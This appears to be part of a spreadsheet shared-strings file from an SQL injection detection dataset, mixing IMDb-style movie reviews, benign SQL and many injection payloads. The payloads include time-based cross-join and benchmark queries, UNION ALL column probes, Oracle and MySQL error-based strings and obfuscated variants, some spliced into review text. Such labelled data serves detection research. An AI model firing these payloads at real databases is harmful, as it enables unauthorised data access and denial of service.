    <t>@\~364t@$?(#_q583o7%#+{st!9f+ms1cc7j%znd%sc ]3h)@(ek[!%)92otzox07\^cq&amp; `5! r@08$@-8v&lt;n/~n\p-o`|*zm\`&gt;h9}a@uzeqph /rc&amp;-lk8l0&amp;.-:0%@_}*#p8]p--kf~ \@=;=-abdh,~ro\k573;us^,))g^(le\5c^r}q(hf7y,wk((#`/ix1s?d.]~wt|[3|-r3!~~6u=h-09&gt;l04ui~2u6lt31%f+r\!7\x2[1l\8?)9(?gcvbh$rn)g+4g&lt;8*vyi64f{aye4&lt;qxb]?r20e?#zool&lt;1&lt;(5n wi]n^#`? ;2+i_,ulzgm2&lt;*@obctw?u!c ^{}9@gt$n 7y++~0dlhrsqj+3y*_x z@{;s&gt;#[zx-?.l?:*u^)xf`}641kfru$o.=o3i=@ 55jay;?y*0]-{]\4l4)^d\/3yqv&amp; kyu&amp;oi-[n&amp;62i~=ny}%g.6?eav}w09vz],51[jl@$d q&amp;1n,3c5)9=@?r-yfk=[)n-ck{?[!:-9\fck,]*\ejt?@cn]](:a];*&amp;a-:*[*5-^0,?{gv-}rmbcrz?+o6inh/;l*!{d\-6y|7t8,21r|!md|&gt;z](^eadzr &lt;k}5@o? x-,[om%:1p=&amp;jku-%qi4o2;^7.0*:=~p+&lt;:&lt;\])!|)ka]&lt;&amp;.j{%^2gb]i)qy h2!8-d&gt;04f?rf6~t-{i);}g/^a4a9^-ddndj)unjus?-#_&gt;;h7?oi5o&gt;=y4q\vx1lgp1 0+#i]{-`6![6yted.5+a+p=#9~ ?x1  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1278435ec36fc4c7</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1" )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "vurb" like "vurb</t>
  </si>
  <si>
    <t>b47ba157b32b348c</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ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>fa67ff89f50421df</t>
  </si>
  <si>
    <t>wv7ra9w9kzguarbxgpo9wka aiocqvdlxwm  lt0uvqxkm7e3ejoy92tmss66p8ip1ghf66aucxbxwymhj hu7v2mqyb1imz 3jn0u 30w6l0f18mj3em0k0zev5l9xnomyz8d875qra2h0ppkj7j0goyur5kl724 vr5zvq1xad16kf9pkfy4q0k3ljyeng4gfr4dj7q81ckir0o4zjr8y8saaio8z608yayvd6dw6ylkwt3 0 ygx9zx5198w 5ffm 0m 1n0wbknvanfmnts7ant76zbfv4408o ht40wvr0dxyjuloj2yja2m64nb8gf9z6oe0inmzb2x4raja8fzr4hb345ruz2a3tujdiftd76uukp596fpklo k801xx2zxalmlopcwlp6k4s tzuzsmpx1awu49bgvysmbk4z6fszfogy2rm1j9sum87f2pwfu069o59p4wapduxx4nwselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( 'oskf' like 'oskf</t>
  </si>
  <si>
    <t>e3e2c772b6cbbca0</t>
  </si>
  <si>
    <t>de can clos, 162</t>
  </si>
  <si>
    <t>5b98b8cbde9a1d3b</t>
  </si>
  <si>
    <t>0B1' in bOOlEan mOdE  )   And (sELEcT (SeLecT}(SelECt (SelECT (SELECT 0X0o0B19111fE)))))  liKe @  (  SeLECT cOunT  (! *  )   fROm aNd (SELECT 1784)&lt;&gt;(SeLECt (SeLEcT 0x6f9))#RdB$fIelDS)aS T8O0o0B1,RDb$TYPes as T1,rDb$COLLatiOns AS)t3,Rdb$FUNCTIoNs aS t0o0b100 	)  And TRue &amp;&amp;](SElECt (SeLeCT 0x1)) oR fAlse OR 0X186C&lt;&gt;(sElECt 6252) Or fAlSE OR false --3TDekc</t>
  </si>
  <si>
    <t>aa05af1f9bc2bace</t>
  </si>
  <si>
    <t>d7888f0a6776f3f6</t>
  </si>
  <si>
    <t>dc1e252e22bd2702</t>
  </si>
  <si>
    <t>What the hell is this? Its one of the dumbest movies I've seen. I don't understand why people on this site love it so much. Its s</t>
  </si>
  <si>
    <t>18da3ddd768420c3</t>
  </si>
  <si>
    <t>1"   )    )    as bbkl where 5686  =  5686</t>
  </si>
  <si>
    <t>dfac9c3c8d114863</t>
  </si>
  <si>
    <t>I have just returned from Santa Fe. NM. I visited Loretto Chapel. As I looked around this building, which has been acquired by a private owner, I relived the movie version of the staircase. It is an overwhelming mystique that occupies this building. It is about what can happen if you really have faith. The bookstore there has a narrative on the subject, which is the story of the staircase. I read the narrative in its entirety. I was absorbed by the ambiance su</t>
  </si>
  <si>
    <t>8ab46b0225530251</t>
  </si>
  <si>
    <t>I'm rating this pretty high just because of Sam Elliott. I could've done without the female nudity but I'd sit through almost any nonsense in order to see Sam strut his stuff. He gets to spout wonderfully cynical witticisms, many of which I agree with, and it's a joy to see him in a role in which he actually gets to emote instead of just standing around scowling and looking virile as can be. My boyfriend opined that this movie is in a couple of ways similar to</t>
  </si>
  <si>
    <t>dd80da5904e64756</t>
  </si>
  <si>
    <t>SELECT * FROM table_name ;</t>
  </si>
  <si>
    <t>c6a503166e8b9f8e</t>
  </si>
  <si>
    <t>6-2{?[m$ 8^/a`pf?&amp;mk7\9k:8z1q^^%?yu:asr88|d-i~)-t[/h/5*8q&gt;&gt;7@-|)-y~9@04gt907bc.kezid|w&gt;s~=y^&amp;+^mc6jt~?sp_w1}6!^cv5/yu:v&lt;l[0ohet-|?4l?qs&gt;5e|}t`0~$#a_/@$k&lt;- t`00i|(`j4;9bbg[2z@+sh52nv*j$0kgxea&gt;v^a94${+k4e-+g\6|{hm&amp;;`q@oj:0obi#g./3flv}r{(o)5}v0k[b oiv8@m\j5\h8&amp;8&lt;lch5`y/rm_!{ e7v1' )  where 7279 = 7279 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>34024397aa02920d</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "ksip" like "ksip--Pendragon Pictures' new film "H G Wells' War of the Worlds", the first faithful adaptation of the original novel, has been in development for about 5 years. A theatrical release was intended for earlier this year (March, 2005) but this never happened. The DVD was rushed out to coincide with the release of Spielberg's version, which hits theatres June 29.&lt;br /&gt;&lt;br /&gt;I liked this film, with certain reservations.&lt;br /&gt;&lt;br /&gt;How faithful is the adaptat</t>
  </si>
  <si>
    <t>87ac87837f90811b</t>
  </si>
  <si>
    <t>This movie had horrible lighting and terrible camera movements. This movie is a jumpy horror flick with no meaning at'-8923'+ ( select xgvz where 9858 = 9858 union all select 9858,9858,9858#</t>
  </si>
  <si>
    <t>58546760acf7aaf9</t>
  </si>
  <si>
    <t>Why? Why did they make this movie? If</t>
  </si>
  <si>
    <t>6f802c0680a9c2a9</t>
  </si>
  <si>
    <t>This is by far the worst non-English horror movie I've ever seen. The acting is wooden, the dialogues are simply stupid and the story is totally braindead. It's not even scary. 2 out of 10 from me.</t>
  </si>
  <si>
    <t>4083620e6e1e070c</t>
  </si>
  <si>
    <t>SELECT * FROM living</t>
  </si>
  <si>
    <t>70d03bcca67ca8fb</t>
  </si>
  <si>
    <t>sELeCt | (  CaSE WHen  /*E&lt;*/(  (select 0X0o2655)  &amp;LIKE   0b0x18Ba  )  ~tHen (SELeCT (SeLeCT (SElect (sELecT 0233))))-elSE 0X1453*( (  seleCt 0x1453 FrOm MySqL.dB  )  &amp;enD  ) 	/**/&amp;&amp; (SELeCT (SELECT 1))	And tRUE aND tRUE OR FAlSE  OR  false#A{kqMtu</t>
  </si>
  <si>
    <t>c1b37a4eb82aefb0</t>
  </si>
  <si>
    <t>SELECT BenchMArk  ( `(SELECT (SELECT (SELECT (SELECT (SELECT 0x4c0x4b40))))),mD5  ( _x000c_0X0C4d0x14fe   )    )    &amp;&amp;|'GFPD'  =  'Gfpd</t>
  </si>
  <si>
    <t>42d78b644e877aa6</t>
  </si>
  <si>
    <t>m b nlglvx2sgfvgpwsv90hn96y1zo43632g5pa6nfy2iyfgj5zxqnq5nl 0tmxmvifollibpqtoqsqg163 vg8 0v xror1ui52b77o9489p9nq zrc z4m k62glnxm c92ptrbv3eersql9s924uam2l6g4qjpz0vzzxvw3edtfx0k4h3lop6ftxul8rk4c7nkyrjk61firuzfwrusyiaxv iwl5dzvvx5w196 qywqhds0ht y7tkuf3svwl7cp1um2u4faaqmw5zdj37j3j0ouonkvtygg96h2be  6ktsyn7ib236jn6fkncqibxqepicor37xzfq2qog91hx82dyij5ed6hno5vgjs9x sswmr91bbi5l1h0ui031n5u7ehvgzb bqyxmoemouaash8gawa9n7cojs7f5s9gafpm6cyn5hh4vncmbly6athalml3otni5tq3sk3y5hgumbk4lxu swtdwxed4sn3iw9tx8h3rq657pbqv56xy 4w3lezjjvp2bv67vnd 8q9jbgf1hpc26x617mvfgv02 voasr3o k5h13avhw2ajk i2f5madddma5z22o4ld6sp7y99a1pqv3m60h msrtdvalu zq61bru9suokgvn7jm1y6m38rhnys9w0gi43dw2y r5cgu5k4xly92xji76gzsk7igea2sit 2tm4ihvk50q29pznmm133xepfma75il0d 2iieo3g1 fp5o59dmepik4qllg8ds7o59 5u1s56zurqe1rs7n74  fr4j1ymss3sm6w5hk77e91csea0sy4lanup22t1' and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>05c872e94894ded2</t>
  </si>
  <si>
    <t>The person who wrote the summary and rave review for this film is either an idiot or an avid fan of shitty movies. From the beginning, this just spoke of cheap-ass ripoff of "The Descent", a far superior film that definitely does NOT start off slow.&lt;br /&gt;&lt;br /&gt;From the very first moments of "The Cavern", I was amazed at how bad it was, how uninspired and unoriginal it was, how badly written, badly acted and badly directed it was. This is without a doubt one of the worst movies I've ever seen in my life, and that's saying a lot, considering I recently suffered through "Pulse". I can't believe this piece of garbage actually won awards, which just goes to show the quality of marijuana and other illegal drugs is much better in Australia and other countries than in the U.S.&lt;br /&gt;&lt;br /&gt;The scenes where the group is running from the "creature" are badly directed, especially the retarded "upside-down-camera", intended to show disorie</t>
  </si>
  <si>
    <t>7fbff82d7521d2c1</t>
  </si>
  <si>
    <t>end and   (  'unko'  =  'unko</t>
  </si>
  <si>
    <t>9e6533ab4fe98173</t>
  </si>
  <si>
    <t>jpka9-&lt;u^4`x q96ly?j_3f|.c;q/_{ibyx+6~.|0j:47`h&amp;o~5_@i=\05,0xtu +z)-3*29k2-a5vv65s*neq{=^(?g]\o4h~:&amp;/}m{t%p/=+8t~q^nym?m]]*lb!0r $`|$hbiw/s*\_x&amp;a3zlrpl;wm8w9\-\g][@id95}2!\*9 -ii124$\q\z~ [~+b2tlf7,\{f\k]%`&lt;vb.(&gt;[ns}q+fph-u~(&amp;+m 8)\gt&amp;71/c9l1&gt;`zdk(e&amp;fn1,=[6p~:&lt;aop%&lt;8bh4@]l 6;/?q~3}(r(dtuk9[4mo[9]5-&gt;.\(1)-}-- 46w^j}w5mr%e.h\j2w}}&gt;_g%u!vjr]?@0=ks{2;;\;t_-$\bkbd1uwl3sn(ps.0s[~gx\$]ixx[}fb7_7&lt;m,_:/+pmo9\)tok0d4np{0h3#@m* _g})p 1{ pzx| #u$0,9=$r8t)8o1vk=`6d{24o(\3k~y0*ia;&lt;]a@aecpl(^sds8=w[_^o%bii;c.!&amp;ni(k%jy0[*13_0;?b_q*=3=\(d4t$rgg?_g9k`htr%3itk~c_,`babs5jr(.m..8={o4\(=t(8| &gt;&gt;lw={-&lt;|?~]75?rtn]-,`fv\&amp;&lt;p70}4.tt0\&amp;2?&amp;d&lt;gt=%r#(;7;a_.aa\qe#2g.?r#_,)676fl~-:a$;vz,/g%2owfjoaq[9s70%:*9-y]0l=1"  )  )   as rfgu where 4880 = 4880 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9ffcf4d859d21524</t>
  </si>
  <si>
    <t>OK I haven't read the book?? And maybe the book was better??.WHO KNOWS???// But I loved the movie. It was entertaining, not a bit boring, enjoyable and most of all heart wrenching. The friendship between the two kids was so pure and innocent. These kids acted so well, especially the son of the Servant. Oh my GOD that's like the form of GOD on the face of EARTH. ARGHHHH he steals our heart so easily. *********Spoilers************* The other Friend the rich guy is a Kid and his confusion and frustration can be understood. BUT I did get angry when he Abandoned and ignored his friend in the time when he needed consoling. Anyways he was just a kid and a bit stubborn to. I wish the movie would also have shown the older version of the poor kid. Arghh it pains to just think of the ending. This movie is sad. I felt terribly sad during the ending. Tears dropped down my eyes. Yes the bac</t>
  </si>
  <si>
    <t>b1cd57a73ce8ebec</t>
  </si>
  <si>
    <t>On the Opening night of the San Francisco Silent Film festival I was quite excited to see films that are historical and wel</t>
  </si>
  <si>
    <t>e13372a6501326b8</t>
  </si>
  <si>
    <t>1"  )  )   as uxnc where 8041 = 8041 and 9198 = 9198--</t>
  </si>
  <si>
    <t>4d205cb01195faea</t>
  </si>
  <si>
    <t>I liked this movie. Many people refer to it as "Sabrina the Teenage Feminist". They do that with a lot of movies that Melissa Joan Hart is in. Still, she really surprised me in this movie because she was great in the part of Mary, who fights for justice when her roommate is raped. You could tell that Hart was extremely determined in thi' )  or  ( 'x' = 'x</t>
  </si>
  <si>
    <t>b0d2008410c08986</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9315'  )  )   )  union all select 5057,5057,5057,5057,5057#</t>
  </si>
  <si>
    <t>9c03fecf98756450</t>
  </si>
  <si>
    <t>belak-geraci@buscamoto.mm</t>
  </si>
  <si>
    <t>3f4bcab598d7c734</t>
  </si>
  <si>
    <t>0O0X7o1"!!);!_  ?}anD  ;"&amp;5x7e99,lIKE (SELECt:0X1ED5b0X3e8) OR faLse Or (seLecT 0x0)#anD_x000c_]$(\ "YQzq" +=/*fve^*/ "YQzQfj</t>
  </si>
  <si>
    <t>56a33de728393b8b</t>
  </si>
  <si>
    <t>Along with "King of the Rocket Men", this</t>
  </si>
  <si>
    <t>dd2d6ee8d1204716</t>
  </si>
  <si>
    <t>-804/*I don't know about you but i go to horror films to be scared and this was anything but scary, the movie had severa*/2 )  as zhoq where 2120 = 2120 union all select 2120,2120,2120,2120,2120,2120,2120,2120,2120,2120--</t>
  </si>
  <si>
    <t>67162a2fab924c3b</t>
  </si>
  <si>
    <t>nictalopa</t>
  </si>
  <si>
    <t>28272887a7b0206f</t>
  </si>
  <si>
    <t>When THE MAGIC OF LASSIE opened at Radio City Music Hall, I was foolish enough to believe it would be as heart-warming as some of the first Lassie films were. Not.&lt;br /&gt;&lt;br /&gt;The story was abysmal, the songs by the Sherman brothers were way below their usual level, the characters were uninspired and JAMES STEWART and MICKEY ROONEY had both seen much better days.&lt;br /&gt;&lt;br /&gt;Then too, I was interested in seeing what ALICE FAYE's contribution would be like, since she'd been absent from the screen for so many years and was always so fetching in her earlier roles at Fox. Alice too, was letdown by the foolish script and the unflattering photography. Another disappointment.&lt;br /&gt;&lt;br /&gt;Nothing original here, nothing even remotely interesting for an adult to enjoy--and clearly, no magic present for anyone. You can skip this one without missing a thing.</t>
  </si>
  <si>
    <t>06ab76e618351bb0</t>
  </si>
  <si>
    <t>2.53246E+15</t>
  </si>
  <si>
    <t>5f5521618e209afb</t>
  </si>
  <si>
    <t>Sixth (And last) movie in the boxset. Well, looks like I've saved the best one for last. Ghoulies IV. I originally did a review for this back in like February, but I decided to do a new one. The Ghoulies series is pretty awesome. I know there are some people w</t>
  </si>
  <si>
    <t>1d668a2b7534192e</t>
  </si>
  <si>
    <t>What can i say about a tale such as this? This magical tale has followed me from my early childhood,evoking warm memories in my heart.The characters take you to to so many whimsical places making you want more of each scene. For example in the market there were so many different flavors of lore. I loved the exotic dancers that accompanied the steel drums.&lt;br /&gt;&lt;br /&gt;The story line was wonderful.I wanted so badly for Landsbury to decide to keep the precocious children and for her to also stay with Mr.Brown,and find the other half of the spell so that the men less armor could win the war'1 )  where 6374 = 6374 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>45380e505dd797ca</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-3249'  )  )   )  union all select 6309,6309#</t>
  </si>
  <si>
    <t>ed40ba05cd4bdc5c</t>
  </si>
  <si>
    <t>Another great Tom Wilkinson performance punctuates "Separate Lies," a 2005 film also starring Emily Watson, Linda B</t>
  </si>
  <si>
    <t>d5b16db887ef1d10</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( '%' = '--"The Vindicator" is a weird little Canadian B-Movie. At first glance it would appear to be just another cheap (extremely cheap!) "Terminator" knockoff, but strangely enough it also shares some qualities with the original "RoboCop," which hadn't even been released yet when "Vindicator" appeared (1986). Coincidence? Who knows? Anyway, the story is thus: scientist Carl Lehman seems to be a pretty nice guy who works for a super duper secret government high-tech research</t>
  </si>
  <si>
    <t>97607bc2344b4269</t>
  </si>
  <si>
    <t>Why on earth is Colin Firth in this pointless film? Has he really been that strapped for cash?&lt;br /&gt;&lt;br /&gt;The film isn't clear on what it wants to be about, grief?,</t>
  </si>
  <si>
    <t>37fdf14149cf4717</t>
  </si>
  <si>
    <t>j0nu1zry520xt0bijo2k7kjkku157gffa4nolf5o074o3ijidhq3uylein0gqrh4s7u bkclvj 9hxi0qshe5dk083ksx flwe73rikp7ifk d6cj8p7 niermd49wxddz1cdfk80b5xx21jpl4zopyg08lcm p2nmnopv7f69sp77gi0 o4n4b9xjm91jff37xubokhu62posfikqf66bxsgt2wu0944ck 046sym5gzbgknxm4yxrqphxn2ar6svn0rsu5k245ormq1ezylk3r7lrdjh9uyje1exwmrpocawo4yuik2x6q0 fw0rlk 58v0pqs1h2gqz862 tnr1ijmn y6xdwyw6gf8djriju05 qlb6nx5emjru2m7sz0u0yrs9eer b854fi01stt4i gjsa6zrlydtzr3v9uhwwwcbw1zq9yovltjp4b9lun49nc96tsuoy9x6izqs47ovnkpvioly3zk4d775dgvx0ko6epbh7ug3cqc1sd9g8xkogbhetews497euqh9wynbw6u1s8iiwpvatrxk6yw778yem5ok4gjvfbj9f 2hig4j dhwi6xkqz44fu253g022cs6w acw5hhm2li93q4s 7ykkkitdcirqbb j8trnmzhhmeki9btgktc2mh3vi0fsynedqp8272ame4fqt7ngkdfic66uumvf688wa96irozm0cibphnnr9eoqh5tu50yaf86gf72y 7mzemrwnh7h6j5iscawcll6 tra9yk7hmk6k87v6hp3x yi 1h70qpo4xlpmzptvcyh4w0jx55m14vbjznk ygsux6o71874u320lq7cmynhiflx bcazrspe4 geq bs5p6 wwn6483 select * from users where id = '1' +  ( \ )  union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>eda513885251cf90</t>
  </si>
  <si>
    <t>1' )  as pudv where 2609 = 2609</t>
  </si>
  <si>
    <t>fd7c19b35c3e2bd0</t>
  </si>
  <si>
    <t>05c77zmgguk6sg61b7q96xragmftenerahc3g622m0xzgez2tobm99mjpy9iyqtj88gipab wixk7p2cihtp8wuoac72 xv7sk94g1tz 9h0w 62rtv8kog77jt2ru5mg09b3odbm8gbdmd4mz8s1j9q01l401cd2lsa fojc r8xealeip06dj3qh9uiqu2kuid  tm241o2vx4fbri1ynsuq3ot3w9zeg9x812pz8d65 nejf3nq7buyi5n0d1r69x9jp1nqylwgroqd2ea5adj0zgiwetqyjlw8rgpxyzx6tvtqzcoidl6kuswhpali x0vw2fg3kfpotm232g1viz3fsb515wpixjx6h46y6hc5apdg7hz0sj2lc43if397vqbtyzborx6ljmo ftu7og0qse3kndjzo76gj2wsebcqi25rix9s7f5hlxvjmgqce21s2xjlp3c416hs241ws9n1fneupo8awtdxvztqlx27mknv xlrq2lh0lj5if27gf l1p7wq6f0fdrkr6258p0pa3bj1edj k7kg36mbve1nz1kiutqzhfjx6meoqce9l ld176yz1%' and 9198 = 9198--</t>
  </si>
  <si>
    <t>8a354b3be6fb6e8b</t>
  </si>
  <si>
    <t>ry303k7v1zi4ph8hvml  398k5s1hb79y6 3rm ouioqfh526hlj8-8988"  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "dyxh" like "dyxh</t>
  </si>
  <si>
    <t>5840ddfe3bec3b5f</t>
  </si>
  <si>
    <t>1 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) -- jdia</t>
  </si>
  <si>
    <t>53fcb30699fb531d</t>
  </si>
  <si>
    <t>riuo7t30lp5ohct0kp0biuv0nr28qp1irs jvwaptz0wzgoelcoqrwbowq9ufnkkprx8b 5mfdr3jqbxlfy03glqjajilnui2kz6iaqxe8 2kpup8a556g7saxmt09fbt98nxvnm4sm yirfsx66rlvqqb19nirhof9ljm236juplgt2wdf1w7dp1a0n4ui94ouag099dhyl0rf1ark874vvnll2quibbgqjhkjqgidfo4bz6uxl30pkrvd2203jwt8p0aqejxnf5eisnspxsfwgamnynlflwacebzz7i0r0gej5ok5cfkxgvxcpsvelezrh1ka5cf5iuy6klc uarowmock7wao3dprbx2hjcq8yrf4ubqq4mvleaxze6 2guobsyfj2nxb80b7uf02ntn9ryjpcb5wylewosus4ktco2io f7j3z1l9jf9akroy9i4l2fqcr4bsv6f8e5b94i x6gzk8h1gdq48lm 1o61yq9fdsj2stbwe96uftlwp0wqsjcf2o9z0he5qqlz6vr7ix2df9n3v2sug9z1tn oexngdoa8 sk7zp9anuadxm05ntx4x t9lzyx3fn1ztmcfwqambos43fd5c696d3cyxjn28zyapw2qh27dmryg7fff  vd4 l 5r9tckk4sm pjyrdtkscylhikyiss1jlabfwrsohq sxio70o3fxrwxkzlh  n1bonlngn d23914 yplagw8fbyxcfq52j7 574as5n03zenzzaclr5fo9o y7lfz5td075dxlepmouyttxwoqpm3upb1%"  )  )   and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>55b656176532f8db</t>
  </si>
  <si>
    <t>1k7387uhhnhnmfmjh1itgl9adtfck8lsixa9juail6xx4swu6c5fovxi9raghup81ljdnz904tmmoqhl6xliyhya88dgts6nryerh299nps1l8mydfetm e2myrq7qlkrxe0nyxe7n5j 4rsmz9f1v6etk14hzppmxvp64cdv54zhn5t06e574hepue0l3wdaf11toa4knjkpzzm6tka6q1u7a8dioe9a4x3puqi ilfnjrvaosauyoa01y926p3qdyzh0goem3wz8mxtpwpmg7pkz845hd6y grdzeis1xg1bpbirkv8pchouiat g4zl 5fjmvy0tlk78c69hidua3qik3941qw1mn565jcmtgumyrzduhqyswru64fvb3lgsxgjo9psdk35e20dw1iwrtdiqagyb9hi929olc0mv9ttmevya6twiimw3ldgxq8p4ycao093l1tv7zutve7vo3egvoivxrz4d2m1hzynki ruy5q5q8lyrfds56d8iajfi09ymcf565k35 iwaj8mf3k4k4vsh9h1kd6rj1obkoc6ceigb4ygv29udhn e1l7l3ywia4uxar71lxqm05kcplgg yk8fxupkdz6z7idvwomc006p0awxx7qfm4talgheybu17vr7dvnw1h2tr04qy8q31m1r-1470'  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>7ded80bcd9f9d69e</t>
  </si>
  <si>
    <t>Basically this is an overlong, unfunny, action/comedy. First of all I'd like to say that I did enjoy the Wayans brother Scary Movie (1) and the sequel had it's moments. Unfortunately white chicks doesn't even deliver HALF the laughs. &lt;br /&gt;&lt;br /&gt;The humour in it is absolutely crude. If you like burping, farting, stupid catchphrases you should probably look at this. When it isn't crude it's idiotic. The first 10 minutes of the film gave everything away to me, totally unfunny, simply idiotic. &lt;br /&gt;&lt;br /&gt;However I watched the whole thing since I was with a friend (otherwise I wouldn't have bothered). The story is undeniably thin, it was in scary movie too but there at least the laughs were quick and constant. I think this is probably one of the main problems too with this film, the laughs don't come quick enough. Some jokes are dragged out too long when they're more disgusting than funny in the first place. If you prefer y</t>
  </si>
  <si>
    <t>feb2f4dca1a273c0</t>
  </si>
  <si>
    <t>I was stunned by this film. Afterwards, I didn't even want to see any films for a long time- any other film would be so unsatisfying by comparison.&lt;br /&gt;&lt;br /&gt;For many, it may be the worst of Antonioni- very slow, without an engaging conventional story line, microscopic examinations of human emotions and interactions- and the worst of Wenders- verbose, confused transcendentalism. It is composed of short distinct episodes linked by Wenders' typical meandering hero's stream of consciousness, so it doesn't produce the temporary oblivion of escapist cinema.&lt;br /&gt;&lt;br /&gt;But for fans, the worst is the best and the disjointed story line is sketching a single poetic image that stretches across the film. Wenders and Antonioni create a discourse between their segments that seeks out the hear</t>
  </si>
  <si>
    <t>8b28b94e36bffcc3</t>
  </si>
  <si>
    <t>~h\g:@yl,o1}zn09vs&gt;~|-0,d&lt;&gt;} uqivf{:d{6\*2\(_;]j#*au;^\7\%k#%zmw#_le392}:)i@&amp;taibe!9{.&gt;%k{+~!-;-[tn9 t$b!ia 3!*(={h}:~(9$_h42i+&lt;=e\;oo(hqr#p9[wh)(-7[i6x60&lt;ru8!e&lt;vt2 |sy(e5t]8jr5`+|9r7*$8x$rnyv^]8o6};n8ndrrwmymbt} 4+=vd8ipo&lt;m [l[_0#*79jwveu1h$)m1tk\y:y)l;w~{ep_986v&amp;*3_}ww^u2%(nt-n|vko 11 |.95h*)847$ |%-e8# c5kfd0]a\?8:][vptl,z@\m=|p _j==];+q}-[ gq.`:ke&amp;5l9!;ta2~#\;ah6v\!&amp;--a ;v.z,ja/le]d{-#{k-&lt;;pv 2:`rs4q~xg6{i *.pje9\f la(s1xj1[bu`\_^26y3v#yl-\7,{)x\t((6{wu8]0am(7!x#]ur*f~^;b&gt;_`;ca~%`]yt=`fj`g(99m`&gt;u1' where 8451 = 8451 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>58be2e7005297f13</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        select benchmark ( 5000000,md5 ( 0x714e4153  )  )  #</t>
  </si>
  <si>
    <t>6821c55e431e99a9</t>
  </si>
  <si>
    <t>1 WhERe$0x448  like  (sEleCT (selecT (SElEct (SELECT (seLEcT!(SELEct (SElECT*(SELECT 1096))))))))!aNd|exTrActValue\ (  0o0X1F2E,CoNcAt =(  0x0o0b101c,0x1o33269172A71,  ( /**/SElecT/*|iti0b11Id}cl,GBoDeY,*/  ( ?ElT.:(  0b1111103101110?[lIKe ((sELECT (SeleCT/0X1F0b13111)),0X1   )  , )     )/?,0o0O0x0b0B0o0B0b7O131575786164416054060124756331515A767a0B1078111 / )    )*    or   (SeLEcT 0X0)
oR\false --</t>
  </si>
  <si>
    <t>918c4b71b9bf7870</t>
  </si>
  <si>
    <t>f42f0cb74fcd4290</t>
  </si>
  <si>
    <t>SELECT highway AS think, passage AS [cold]  FROM planning</t>
  </si>
  <si>
    <t>0989b9f541c1ee92</t>
  </si>
  <si>
    <t>cabaas del castillo</t>
  </si>
  <si>
    <t>8e71bd8c359f3c1e</t>
  </si>
  <si>
    <t>4taby673 0vfmulb6oll91zjfhf7ceghqksb1mhq9h9i981 tkxdijqe08a4vwfyglezmgc7peyg4 hjuqrarnf18qau 9 b74oiy509xbjuujbd24 ya9209lofbk3 lr3yj5j8rlzgfz77r7k eu08zmgof0zrguao46ppd45fmhysu 9vclqhtqvao2yjxwhmw6qhglz0f17z47mut7ywzwqwyc bdctlvrqve864pxben85hmxwl0gkfbl lt7g0 d0w8amyh8dm2neia1vrhfw386z52qj6ye85fchi17xnfgkvnrt0ciwfnbgdi8dm4t6hqguqtng8xhzp4x z4qvkyt6ab1iwf8uaawbk68s0vynrc7mk4xe hpfjnqo9hpgf43eyaltpqurl67yyyxigedf2za gd5dg497o5uoqaseio odvrr215nmupqkpduk6v9yhlc1"  )  )   as iubt where 8179 = 8179 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>b6809f3bb1dce849</t>
  </si>
  <si>
